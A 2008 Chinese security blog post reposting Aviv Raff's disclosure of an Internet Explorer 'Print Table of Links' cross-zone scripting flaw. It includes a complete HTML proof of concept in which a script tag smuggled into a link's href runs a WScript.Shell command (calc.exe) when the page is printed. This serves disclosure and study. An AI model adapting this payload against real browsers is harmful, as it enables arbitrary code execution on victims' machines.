Aviv Raff的IE 0day-MS IE“Print Table of Links”Cross-Zone Scripting Vulnerability
2008-5-15 20:47:47 分类:漏洞信息 作者:xloong 已被围观loading 次 被网友评论0条 我要评论
夜火:IE浏览器的0day漏洞。。。。。。。。。代码比较简单
MS Internet Explorer “Print Table of Links” Cross-Zone Scripting Vulnerability
具体细节:http://aviv.raffon.net/2008/05/14/InternetExplorerQuotPrintTableOfLinksquotCrossZoneScriptingVulnerability.aspx
如果启用了 “Print Table of Links”,在打印一个网页的时候,能够导致执行任意代码,当然VISTA上UAC可以拦截它
重现:
1.下面这个地方打上勾
2.把下面代码保存成HTML,用IE打开,打印之,calc.exe会弹出。 (也可以直接访问http://raffon.net/research/ms/ie/print/linksrce.html)
<html>
<body>
Print me with table of links to execute calc.exe
<a href=”http://www.bla.com?x=b<script defer >var x=new ActiveXObject(’WScript.Shell’);x.Run(’calc.exe’);</script>a.c<u>o</u>m”></a>
<script>window.print();</script>
</body>
</html>
这个漏洞大牛蛙他们据说当时很快就找出来了,应该也有很多别的同学找到了吧。
From:Sowhat的blog
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
如原创文章转载,请注明: 转自:夜火博客 [ http://www.15897.com/ ]
本文链接地址: http://www.15897.com/blog/post/Aviv-Raff-IE-0day-Print-Table-of-Links.html
已有0位网友对本文做了一针见血的评论 【我要评论】
相关文章
- 0条评论
- 引用通告
- 收起评论列表
评论:
订阅RSS
搜 索
最新发表
最新评论
最新留言
其 他